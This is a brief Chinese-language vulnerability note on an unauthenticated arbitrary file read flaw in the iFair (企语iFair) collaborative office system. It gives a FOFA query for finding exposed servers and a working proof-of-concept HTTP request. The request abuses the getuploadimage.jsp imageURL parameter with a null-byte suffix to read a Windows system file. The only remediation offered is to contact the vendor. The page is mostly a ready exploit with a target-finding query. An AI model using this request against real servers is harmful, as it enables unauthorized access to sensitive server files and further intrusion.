Nx01 产品简介
企语iFair协同管理系统是一款专业的协同办公软件,该管理系统兼容性强,适合多种企业类型。
Nx02 漏洞描述
企语iFair协同管理系统存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取服务器敏感信息。
Nx03 产品主页
fofa-query: app="服务社-企语iFair"
Nx04 漏洞复现
POC:
GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%00.jpg HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Nx05 修复建议
建议联系软件厂商进行处理。